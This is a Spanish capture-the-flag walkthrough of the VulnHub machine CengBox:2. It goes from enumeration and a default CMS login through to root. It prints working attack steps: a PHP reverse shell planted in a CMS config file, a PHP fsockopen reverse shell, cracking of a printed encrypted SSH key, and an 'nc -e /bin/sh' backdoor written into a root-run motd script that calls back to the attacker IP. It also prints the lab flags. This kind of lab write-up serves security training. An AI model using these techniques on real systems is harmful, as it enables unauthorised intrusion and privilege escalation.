[VLN] CengBox:2

Hoy vamos a hackear la maquina de Vulnhub llamada CengBox:2. Podeis descargarla desde el siguiente enlace: CengBox-2

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

sml@Cassandra:~$ nmap -A -p- 192.168.1.103
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-28 22:45 CEST
Nmap scan report for cengbox.home (192.168.1.103)
Host is up (0.00033s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             209 May 23 07:21 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.148
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 
2.0)
| ssh-hostkey: 
|   2048 c4:99:9d:e0:bc:07:3c:4f:53:e5:bc:27:35:80:e4:9e (RSA)
|   256 fe:60:a1:10:90:98:8e:b0:82:02:3b:40:bc:df:66:f1 (ECDSA)
|_  256 3a:c3:a0:e7:bd:20:ca:1e:71:d4:3c:12:23:af:6a:c3 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site Maintenance
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.32 seconds
Nos conectamos al ftp como usuario anonymous para ver si hay alguna pista.

sml@Cassandra:~$ ftp 192.168.1.103
Connected to 192.168.1.103.
220 (vsFTPd 3.0.3)
Name (192.168.1.103:sml): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             209 May 23 07:21 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (209 bytes).
226 Transfer complete.
209 bytes received in 0.00 secs (276.1862 kB/s)
ftp>
Leemos el fichero note.txt

sml@Cassandra:~$ cat note.txt
Hey Kevin,
I just set up your panel and used default password. Please change them before 
any hack.

I try to move site to new domain which name is ceng-company.vm and also I 
created a new area for you.

Aaron
Al leer la nota, vemos que habla de un dominio, asi que agregamos el dominio ceng-company.vm al fichero /etc/hosts. Hacemos bruteforce de los subdominios para ver si encontramos algo interesante.

sml@Cassandra:~$ gobuster vhost -u ceng-company.vm -w 
/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
Vemos que ha aparecido el dominio admin.ceng-company.vm. Lo agregamos tambien al fichero /etc/hosts. Echamos un vistazo al nuevo dominio.

sml@Cassandra:~$ gobuster dir -u http://admin.ceng-company.vm -w 
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,htm,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://admin.ceng-company.vm
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,htm,txt
[+] Timeout:        10s
===============================================================
2020/05/29 19:58:03 Starting gobuster
===============================================================
/server-status (Status: 403)
/gila (Status: 301)
===============================================================
2020/05/29 20:03:17 Finished
===============================================================
Encontramos el directorio gila. Al explorarlo vemos que se tratra de GilaCMS.

Low Shell


Visitamos http://admin.ceng-company.vm/gila/admin y vemos que nos pide user y pass. En la nota anterior mencionaban al usuario kevin, asi que "suponiendo" ponemos de usuario: kevin@ceng-company.vm. El password, tras probar los tipicos, el bueno es: admin Asi que los credenciales son: kevin@ceng-company.vm/admin Preparamos una reverse shell en php.

sml@Cassandra:~$ cp /usr/share/webshells/php/php-reverse-shell.php .
sml@Cassandra:~$ mv php-reverse-shell.php shell.php
sml@Cassandra:~$ nano shell.php #Modificamos para poner nuestros datos.
En el GilaCMS, vamos a content filemanager y modificamos el fichero config.php para que tenga el contenido de nuestra reverse shell. Una vez guardado, ponemos nc a la escucha:

sml@Cassandra:~$ nc -nlvp 1234
Y visitamos: http://admin.ceng-company.vm/gila/config.php

sml@Cassandra:~$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.103] 55508
Linux cengbox 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 
x86_64 x86_64 x86_64 GNU/Linux
 11:47:36 up  7:48,  0 users,  load average: 0.00, 0.00, 0.08
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Ahora que estamos dentro, miramos que podemos hacer.

$ sudo -l
Matching Defaults entries for www-data on cengbox:
    env_reset, mail_badpass, 
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
snap/bin

User www-data may run the following commands on cengbox:
    (swartz) NOPASSWD: /home/swartz/runphp.sh
Vemos que usando sudo, podemos ejecutar un script como el usuario "swartz".

$ cd /home/swartz
$ ls -la
total 44
drwxr-xr-x 4 swartz swartz     4096 May 26 05:05 .
drwxr-xr-x 4 root   root       4096 May 23 04:57 ..
-rw------- 1 swartz swartz        1 May 26 07:16 .bash_history
-rw-r--r-- 1 swartz swartz      220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 swartz swartz     3771 Aug 31  2015 .bashrc
drwx------ 2 swartz swartz     4096 May 23 12:48 .cache
drwx------ 2 swartz developers 4096 May 26 05:05 .gnupg
-rw------- 1 swartz developers    1 May 26 07:16 .php_history
-rw-r--r-- 1 swartz swartz      655 May 16  2017 .profile
-rw------- 1 swartz developers    1 May 26 07:17 .viminfo
-rwxr-xr-x 1 swartz swartz       20 May 26 03:17 runphp.sh
Miramos el codigo.
                                                                                                        
$ cat runphp.sh                                                                 
#!/bin/bash                                                                     
php -a   
El codigo nos va a dejar ejecutar php de forma interactiva. Asi que lo utilizaremos para obtener una shell. Ponemos nuestro nc a la escucha.

nc -nlvp 5555
Y para obtener la shell...
                                                                                                                                                     
$ sudo -u swartz /home/swartz/runphp.sh
Interactive mode enabled

No entry for terminal type "unknown";
using dumb terminal settings.                                                     

$sock=fsockopen("192.168.1.148",5555);                                                                                                  
exec("/bin/sh -i <&3 >&3 2>&3");  
Obtenemos la shell como swartz :)

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.103] 34744
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(swartz) gid=1002(developers) groups=1002(developers)
Vemos que swartz pertenece al grupo developers. Dicho grupo puede leer las keys ssh que se encuentran en el directorio /home/mitnick.

$ groups
developers
$ cd /home/mitnick
$ ls -la
total 48
drwxr-x--- 4 mitnick developers 4096 May 25 13:56 .
drwxr-xr-x 4 root    root       4096 May 23 04:57 ..
-rw------- 1 mitnick mitnick       1 May 26 07:17 .bash_history
-rw-r--r-- 1 mitnick mitnick     220 May 23 03:57 .bash_logout
-rw-r--r-- 1 mitnick mitnick    3771 May 23 03:57 .bashrc
drwx------ 2 mitnick mitnick    4096 May 23 04:01 .cache
-rw------- 1 mitnick mitnick     505 May 23 06:21 .mysql_history
-rw------- 1 mitnick mitnick       1 May 26 07:18 .php_history
-rw-r--r-- 1 mitnick mitnick     655 May 23 03:57 .profile
drwxr-x--- 2 mitnick developers 4096 May 25 14:08 .ssh
-rw------- 1 mitnick mitnick       1 May 26 07:17 .viminfo
-rw------- 1 mitnick mitnick      33 May 23 13:31 user.txt
$ cd .ssh
$ ls
authorized_keys
id_rsa
id_rsa.pub
$ ls -l
total 12
-rw-r--r-- 1 mitnick developers  397 May 25 14:08 authorized_keys
-rw-r--r-- 1 mitnick developers 1766 May 25 14:07 id_rsa
-rw-r--r-- 1 mitnick developers  397 May 25 14:07 id_rsa.pub
Miramos la key id_rsa.

$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,21425CA12E394F02C77645793C350D91

jOzfhmCwJQ8eqkzxuAgaXxy8Nh0AL1NR2dXz0tZVbSRRKdUcAeXQFkNYdAH+InjR
mg0FUtcz69l5iomrBHd71ZnK4iQMVcZZ37r8fAQppvZVGhKbf5DGmnyDZiTxGtdv
O6kEQOXOAVUce+bMDEgChMEdORmk2yisizjDi9IMttWQ3VMyaHoyRp2UOCjntZPC
KcpQMGjWJEos3ZrlIrfX/FSkfT0QkwdzkigeJsC7zH0AioH55tdfAY8d33AJuSQ0
7I7z5qMfn7tfNd8n642xFGnRV2YMCYiO8XB0f5OJz67T4doagB985ZNDtqJdxkoF
kXlqdvs1KJzCAMu9m0m4UV7ZR7qmYKiFXnEkl/hE9i3CF9S6UOjKKRZq26TpJVj4
a4WJ+yauszPVI9KlnB7X9g5cd3Xoe04ROWbaVhx0tv3ipjcbGOPcuQudiMH8P0rj
pXI0YD/nDSV9gCqfgi0wJTag8LK+4ZUENHu3ThukuONCGZpkdJg/UETu9m8Cl8CR
pa4khXbI+1J7frvqUFq+op3CBT4GccKUbD4B/Sa2BLjsOV75A/tpffr2ROo8KxaL
HFHJUqwhTCk6qp5Hx6tQWtaUQ7gdOJ1BMARts/x3rGpphdmSwqZqusdrw/KS3TbH
VkjpO5lABvEMGl2/HbB2flEZk+fkJ3YNq78+IQSxNSDFPsAIMySFmro+tf9X7KWu
hna6795X13c+WdE5hEsK6X2bOkZhFln/6Rkz5BsWNlaBVQwYfthfepN+e4NwdtcT
e/NZt/Cppe+J74ABmC8FyKVr+sbnb2MWWwg2nQ9aPEcDinjWk7ALtJbwIG46Udb9
l/c8/RSot4rRA3ADHj5JZtEAnnrwCHO7cc4yGLEJOneSPxz4yW8vSGDd7iAWjYuE
Y0CDY6iH2cvi3rrVrfUZ1beHMcegRtsTgPj2tbd7x4FD6xY+Vha+Va/OV6F7kuE7
fgS5uJs/WqCVemQWKLfa22AMeCRn5qB9AT1gAGbH5oFlrOtOvvbpZsdiRSp86mx5
/Pzrio/5e0kZ1b4+PF1cUOzFJOVOADl8hGQxE9LYOozxKGdSEP1oJOhThCGQVK8W
cQZ91RSt5tbQbhO3T4r8whOgOFyf3N/jEJ2IBzFKDZAqn0oxUzQFcBnsYIMhO29F
bTH6WyWaIy97HxSEzMmMUJo78n8uptNkglFPYp0LTzTEXsEYC6WxGBIihXQHEJlJ
1XxTCMoZFkZ2IpL9TmRtdWcqKBjiXLXuPjpMaIlg3tL8AEqR92stCPpyIVkfsxRf
j+FgaA97zTv8je+uGIAyv3fl3W69LOsMSTGwZutxngBsyhK3FbzF5r1c6c55jxXK
Tj+QuvPjLwGNT9KQ3XT4oGe5KSiSQ3ZhA4K1AhGyfCxhA2hdK7Y9RZVxKISCzjsY
4oNeFNZKIhTIWITNcr4/ebGiQuyLyOQpTgP6kpiLDYcZlPdIjdBAEjF+5rVcuxfB
xtHilk7LLiLarD6lFaF4bYoB2lwW0ioUzvZYUjLIT7RyrDa6tnidXI9aVAWgLFor
xi3Ed0lgkxkFm6AFQ0Zq1R8MqI4+6apX4nqqV/ybGpBFwpjgI//mOlHf9kdxp0Pk
-----END RSA PRIVATE KEY-----
Nos la copiamos a nuestra maquina y usamos john para crackear la key y obtener el passphrase.

sml@Cassandra:~$ nano kevin.key
sml@Cassandra:~$ chmod 600 kevin.key
sml@Cassandra:~$ python /usr/share/john/ssh2john.py kevin.key > kevin.hash
sml@Cassandra:~$ /usr/sbin/john kevin.hash --wordlist=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded 
hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
legend           (kevin.key)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:04 DONE (2020-05-29 22:31) 0.2173g/s 3117Kp/s 3117Kc/s 
3117KC/sa6_123..*7¡Vamos!
Session completed
Vemos que es legend, sabiendo esto, nos logueamos.

user.txt



sml@Cassandra:~$ ssh -i kevin.key mitnick@192.168.1.103
Enter passphrase for key 'kevin.key': 

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

176 packages can be updated.
129 updates are security updates.

Last login: Tue May 26 07:12:16 2020 from 192.168.0.14
To run a command as administrator (user "root"), use "sudo ".
See "man sudo_root" for details.

mitnick@cengbox:~$ cat user.txt
a10333b0b7c3f914e8c446fd8e9cd362

Privilege Escalation


Nos descargamos pspy64 y nc.

mitnick@cengbox:~$ wget http://192.168.1.148/pspy64
mitnick@cengbox:~$ chmod +x pspy64
mitnick@cengbox:~$ wget http://192.168.1.148/nc
mitnick@cengbox:~$ chmod +x nc
Ejecutamos pspy64, y mientras se ejecuta, en otro terminal nos volvemos a loguear con el usuario mitnick. Al hacerlo, vemos que se ejecutan varios scripts (los del update-mot.d/*) sobre los cuales tenemos permisos de escritura.

---SNIP---
2020/05/31 01:47:31 CMD: UID=0    PID=2348   | /bin/sh /etc/update-motd.d/91-release-upgrade 
2020/05/31 01:47:31 CMD: UID=0    PID=2347   | /bin/sh /etc/update-motd.d/91-release-upgrade 
2020/05/31 01:47:31 CMD: UID=0    PID=2346   | /bin/sh /etc/update-motd.d/91-release-upgrade 
2020/05/31 01:47:31 CMD: UID=0    PID=2345   | /bin/sh /etc/update-motd.d/91-release-upgrade 
2020/05/31 01:47:31 CMD: UID=0    PID=2349   | /bin/sh -e /usr/lib/ubuntu-release-upgrader/release-upgrade-motd 
---SNIP---
Sabiendo esto, modificaremos el fichero /etc/update-motd.d/00-header, y le agregaremos la siguiente linea:

/home/mitnick/nc -e /bin/sh 192.168.1.148 3333
En otra terminal pondremos nc a la escucha...

sml@Cassandra:~$ nc -nlvp 3333
Y por ultimo, en una tercera terminal, nos loguearemos de nuevo como el usuario mitnick. Si todo ha ido bien, obtendremos una shell de root :)

sml@Cassandra:~$ nc -nlvp 3333
listening on [any] 3333 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.103] 52438
id
uid=0(root) gid=0(root) groups=0(root)

root.txt



cd /root
ls
root.txt
cat root.txt
  _____ ______             ____            ___  
 / ____|  ____|           |  _ \          |__ \ 
| |    | |__   _ __   __ _| |_) | _____  __  ) |
| |    |  __| | '_ \ / _` |  _ < / _ \ \/ / / / 
| |____| |____| | | | (_| | |_) | (_) >  < / /_ 
 \_____|______|_| |_|\__, |____/ \___/_/\_\____|
                      __/ |                     
                     |___/                      

I would be grateful for your any feedback. Feel free to contact me on Twitter 
@arslanblcn_

de89782fe4e8bf2198a022ae7f50613e

End


Y con esto ya seriamos root de la maquina :)